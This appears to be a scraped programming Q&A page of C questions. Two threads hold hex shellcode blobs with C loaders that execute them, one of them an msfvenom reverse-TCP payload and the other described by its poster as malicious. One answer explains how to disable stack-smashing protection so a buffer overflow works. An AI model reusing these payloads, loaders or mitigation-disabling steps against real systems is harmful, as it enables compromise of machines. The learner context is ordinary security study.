I recently get interested in Metasploit, and I was trying to execute some shellcode from C code.
So i've generated with msfvenom a shellcode for LHOST = 127.0.0.1 and LPORT = 714 (so if you want to run the shellcode, no problem because localhost) and selected C format for output.
Then I found this : http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/
and this : http://www.sevagas.com/?Hide-meterpreter-shellcode-in-executable
So what I did :
#include <stdio.h>
char code[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\x7f\x00\x00\x01\x68\x02"
"\x00\x02\xca\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3";
int main(int argc, char **argv) {
int(*func) ();
func = (int(*) ()) code;
(int)(*func) ();
}
Compiled it, launched it.. And crash....
Exception non gérée à 0x00338000 dans Shellcode.exe : 0xC0000005 :
Violation d'accès lors de l'exécution à l'emplacement 0x00338000.
The crash is happening here : (int)(*func) ();
As I don't really understand what's the program is trying to do (I'm quite new to C), I don't know from where is the problem.. Is it my shellcode or is it the way it is called ?
And does someone has some documentation about executing shellcode in C/C++ ?
Thanks all for your help.
You are getting segmentation fault because the memory is not marked as executable.
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
void *buf;
/* copy code to executable buffer */
buf = mmap (0,sizeof(code),PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_ANON,-1,0);
memcpy (buf, code, sizeof(code));
/* run code */
int i = ((int (*) (void))buf)();
printf("Return value [%d]\n", i);
The bytes represent machine instructions. On ordinary machines, the memory is broken in different memory segments, and code will typically goes in a data segment. The call:
int(*func) ();
func = (int(*) ()) code;
(int)(*func) ();
tries to execute the code contained in these bytes.
However, modern operating systems provide usually by default a protection against executing code located in memory segments not designed for code execution (see here for example). You have to configure your compiler to disable it.
Related
Im following James Molloy`s guide to create small OS and now i stuck on interrupt. I dont really understand how to call my interrupt handlers instead of this command:
asm volatile("int $0x21");
Main file
#include "monitor.h"
#include "multiboot.h"
#include "descriptor_tables.h"
#include "timer.h"
#include "paging.h"
#include "simple.h"
int main(struct multiboot *mboot_ptr){
// Initialise all the ISRs and segmentation
init_descriptor_tables();
// Initialise the screen (by clearing it)
monitor_clear();
monitor_write("Hello, paging world!\n");
init_simple();
asm volatile("int $0x21");
return 0;
}
Where 0x21 is an interrupt`s number in vector.Is there a method to make a interrupt using a c command?
For example i want use this commands:
char c; // for interrupt created and handler allocate memory for char/int etc.
char c = 'a'; // allocate + assing
c; // get value
c = 'b'; // assing new value
Is there any possible way to do it?
Interrupts are generated by the CPU itself.
While C is commonly used to write the interrupt handlers in the kernel, there is no unique facility (or machine model) dictating their creation using it.
Recently I came across the problem of geting 'Oops, Spwan error, can not allocate memory' while working with one C Application.
To understand the File Descriptor and Memory management better I give a try this sample program and it gives me shocking result.
Here is the code.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int ac, char *av[]);
int main(int ac, char *av[])
{
int fd = 0;
unsigned long counter=0;
while (1)
{
char *aa = malloc(16384);
usleep(5);
fprintf(stderr,"Counter is %ld \n", counter);
fd = fopen("/dev/null",r")
}
return 0;
}
Here in the sample program I am trying to allocate memory every 5 micro second and also open a file descriptor at the same time.
Now when I run the program it started increasing the memory and also file descriptor star increasing, but memory increase upto 82.5% and file descriptor increase upto 1024. I know 'ulimit' set this parameter and it is 1024 by default.
But this program must crash by eating the memory or it should gives error ' Can't spawn child', but it is working.
So Just wanted to know why it is not crashing and why it is not giving child error as it reached file descriptor limit.
It's not crashing probably because when malloc() finds no more memory to allocate and return, it simply returns NULL. Likewise, open() also just returns a negative value. In other words, the cooperation of your OS and the standard library is smarter than it would enable your program to crash.
What's the point in doing that?
Plus on linux, the system won't even eat up the memory if nothing is actually written on "aa".
And anyway, if you could actually take all the memory (which will never happen, for Linux and *bsd, don't know about windows), it would just result in making the system lag like hell or even freeze, not just crashing your application.
I was trying to do a buffer overflow (I'm using Linux) on a simple program that requires a password. Here's the program code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int check_authentication(char *password){
int auth_flag = 0;
char password_buffer[16];
strcpy(password_buffer, password);
if(strcmp(password_buffer, "pass1") == 0)
auth_flag = 1;
if(strcmp(password_buffer, "pass2") == 0)
auth_flag = 1;
return auth_flag;
}
int main(int argc, char **argv)
{
if(argc < 2){
printf("\t[!] Correct usage: %s <password>\n", argv[0]);
exit(0);
}
if(check_authentication(argv[1])){
printf("\n-=-=-=-=-=-=-=-=\n");
printf(" Access granted.\n");
printf("-=-=-=-=-=-=-=-=\n");
} else {
printf("\nAccess Denied.\n");
}
return 0;
}
OK, now I compiled it, no errors, and saved it as overflow.c.
Now I opened the Terminal, I moved into the file directory (Desktop) and then wrote:
./overflow.c AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The Terminal said: "Stack smashing detected" (or something like that) and then quit the program execution.
Now, I'm reading a book, called "Hacking - The Art Of Exploitation" by Jon Erickson. In a chapter, he explains this type of exploit (I took the code from the book) and does the same command I've done. The memory overflows and the program prints "Access granted.". Now, why my OS is detecting I'm trying to exploit the program? I've done something wrong?
I also tried the exploit on Mac OS X. Same thing happened. Please, can someone help me? Thanks in advance.
In modern linux distributions buffer overflow is detected and the process is killed. In order to disable that mode simply compile your application with such flags (gcc):
-fno-stack-protector -fno-stack-protector-all
If compiling with gcc, add -fno-stack-protector flag. The message you received is meant to protect you from your bad code :)
The reason is stack smashing is actually a protection mechanism used by some compilers to detect buffer overflow attacks. You are trying to put the 29 A's into a shorter character array (16 bytes).
Most modern OS have protective mechanisms built in. Almost any good OS does not allow direct low level memory access to any program. It only allows programs to access the adress space allocated to them. Linux based OS automatically kill the processes that try to access beyond their allocated memory space.
Other than this, OS also have protective mechanisms that prevent a program from crashing the system by allocating large amounts of memory, in an attempt to severely deplete the resources available to the OS.
I have a program running on an ARM-based embedded device. A certain struct, globally accessible, is being dumped every so often to disk and represents about 160Kb of data.
I need to examine the contents of this structure. So far I have used a Python script together with the struct library to parse the contents of that dump, but this approach doesn't scale very well.
I thought it was possible to use the cross-compiling GDB program to do this. I want to copy the contents of that file back into memory, at the address of the structure. So this is what I tried:
$ arm-eabi-gdb
....
(gdb) target sim
Connected to the simulator.
(gdb) file MS.elf
Reading symbols from MS.elf...done.
(gdb) p &my_struct
$1 = (MyStruct *) 0x6801149c
(gdb) restore ~/Dumps/MS_20121128_164606 binary 0x6801149c
You can't do that without a process to debug.
Is this the correct approach? If yes, what am I doing wrong?
I would write a small program that reads in the struct and then in the
debug mode print it.
The program needs to be compiled on system with the same
architecture characteristics as ARM. I.e. same sizeof
char, int, short, long, float, double and pointer.
Also, the byte ordering needs to be the same as on ARM.
If you are looking at the struct often, then it would be
worth pretty printing out the contents of the struct
instead of constantly using gdb to see the contents.
Since the structure is quite large, I would also go the
extra step of using an API that puts the structure
in a folder/document type tree in a browser so that
you can zoom in or browse different parts of the struct.
If anyone interested in this, let me know.
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
struct Foo {
/* contents of the struct go here */
};
int
main()
{
struct Foo tmp;
int fd, r, n = sizeof(tmp);
fd = open("struct_dump", O_RDONLY);
if (fd < 0) {
printf("could not open struct_dump.\n");
exit(0);
}
r = read(fd, &tmp, n);
if (r != n) {
printf("mismatched struct sizes.\n");
exit(0);
}
/*
* Stop here in gdb and do 'p tmp'
*/
close(fd);
exit(0);
}
#include <stdio.h>
char shellcode[] = "some shellcode here";
int main (int argc, char **argv) {
void (*sptr)();
sptr = (void(*)()) (&shellcode);
sptr();
printf("must display this");
return 0;
}
While running the program, it executes the sptr() and hangs there, probably because of the shellcode is running in memory. printf("..") is never executed. My problem is I want the program to execute printf().
Please help :)
Reply to Eric Finn and Alvin Wong
I changed as what both of you instructed and the error I got is:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
X:>"my program.exe"
'»".¼' is not recognized as an internal or external command,
operable program or batch file.
must display this
char shellcode[] is valid. I have compiled it successfully before.
below is the original code with malicious shellcode so your antivirus should detect it, just to verify you guys that the shellcode is not the problem:
#include <stdio.h>
#include <stdlib.h>
char shellcode[] = "\xda\xd3\xd9\x74\x24\xf4\xbd\xe9\x6d\xf8\x29\x58\x33\xc9\xb1"
"\x58\x31\x68\x18\x83\xe8\xfc\x03\x68\xfd\x8f\x0d\xd5\x15\xc6"
"\xee\x26\xe5\xb9\x67\xc3\xd4\xeb\x1c\x87\x44\x3c\x56\xc5\x64"
"\xb7\x3a\xfe\xff\xb5\x92\xf1\x48\x73\xc5\x3c\x49\xb5\xc9\x93"
"\x89\xd7\xb5\xe9\xdd\x37\x87\x21\x10\x39\xc0\x5c\xda\x6b\x99"
"\x2b\x48\x9c\xae\x6e\x50\x9d\x60\xe5\xe8\xe5\x05\x3a\x9c\x5f"
"\x07\x6b\x0c\xeb\x4f\x93\x27\xb3\x6f\xa2\xe4\xa7\x4c\xed\x81"
"\x1c\x26\xec\x43\x6d\xc7\xde\xab\x22\xf6\xee\x26\x3a\x3e\xc8"
"\xd8\x49\x34\x2a\x65\x4a\x8f\x50\xb1\xdf\x12\xf2\x32\x47\xf7"
"\x02\x97\x1e\x7c\x08\x5c\x54\xda\x0d\x63\xb9\x50\x29\xe8\x3c"
"\xb7\xbb\xaa\x1a\x13\xe7\x69\x02\x02\x4d\xdc\x3b\x54\x29\x81"
"\x99\x1e\xd8\xd6\x98\x7c\xb5\x46\xc0\x0a\x45\xfe\x7d\x9a\x2b"
"\x97\xd5\x34\xf8\x10\xf0\xc3\xff\x0b\xcd\x34\xa8\xe4\x79\x9c"
"\x3d\x0a\xd2\x4a\xf8\x5c\xa3\x2d\x03\xb5\xb8\x79\xa7\x04\xf6"
"\x2f\x06\x0c\x0b\x81\xf9\xb8\x5b\x21\xfa\x38\x0f\x71\x92\x6f"
"\x26\xee\xa4\x70\xed\xfa\x1d\xd7\x3f\x2f\x0f\x8f\x3f\xcd\x90"
"\xcb\x12\x83\x82\x82\xc0\x73\x4b\xcf\xb0\x5d\xb0\xf0\xee\x2b"
"\x00\x64\x01\x77\xbc\x87\x76\xd0\xe9\x20\x2f\xb6\x38\xc8\xd7"
"\x3d\xbc\x01\x62\x01\x37\xb3\x26\xf6\xa8\x28\x51\x1d\x81\x46"
"\x65\x1d\xed\x69\x45\x98\x22\xf8\xdf\x5c\x43\x6a\x10\xe9\xe1"
"\x3c\x2f\xc7\x8c\x80\xa7\xe8\x40\x00\x38\x81\x60\x00\x78\x51"
"\x36\x68\x20\xf5\xeb\x8d\x2f\x20\x98\x1e\x83\x42\x78\xf7\x4b"
"\x55\xa7\xf7\x8b\x06\xf1\x9f\x99\x3e\x74\xbd\x61\xeb\x02\x81"
"\xea\xd9\x86\x06\x12\x21\x1d\xc8\x61\x40\x46\x0b\x61\xef\x88"
"\x74\x8d\x9d\x1f\xe9\x00\x31\x93\x82\x82\xb9\x7d\x3f\x24\x2f"
"\x82";
int main (int argc, char **argv) {
void (*sptr)();
sptr = (void(*)()) (&shellcode);
sptr();
printf("must display this"); // instead of more lines i put this one
return 0;
}
the above code compiles successfully and runs perfectly
i changed some lines to system(shellcode). it compiles but doesnt run properly
Okay, since shellcode is actually machine code rather than shell code (according to your latest edit), the answer is different.
When you declare char shellcode[], shellcode is a pointer to a memory location. This means that instead of
sptr = (void(*)()) (&shellcode);
you should have
sptr = (void(*)()) (shellcode);
Additionally, you want the code to be in the executable part of your binary, rather than in the data part of the binary. That means you want char *shellcode = ... rather than char shellcode[] = ....
Also, you should be sure that shellcode is a valid compiled C function with the same calling convention as the code that calls it.
As my understanding, you want to run some "machine code" (not shellcode), and no matter how the code runs it should continue the program.
This is possible, by using threading.
First add these includes:
#include <windows.h>
#include <process.h>
And in your code:
void (*sptr)(void*); // Type for `_beginthread`
sptr = (void(*)(void*)) (&shellcode); // PLEASE rename to `machinecode`
_beginthread(sptr,0,NULL); // This starts your code in a new thread
Sleep(5000); // Wait for 5000 ms
printf("must display this");
Of course this is not a proper way to multi-thread a program, but since your code is "machine code" there's not much to be done.
P.S. When I try your code it finally reaches an "Access violation" (segmentation fault) (and it shows the "x.exe encountered a problem" dialog), and my antivirus didn't detect anything (do I need to switch to another one??), so you may need to review the code or add an exception handler...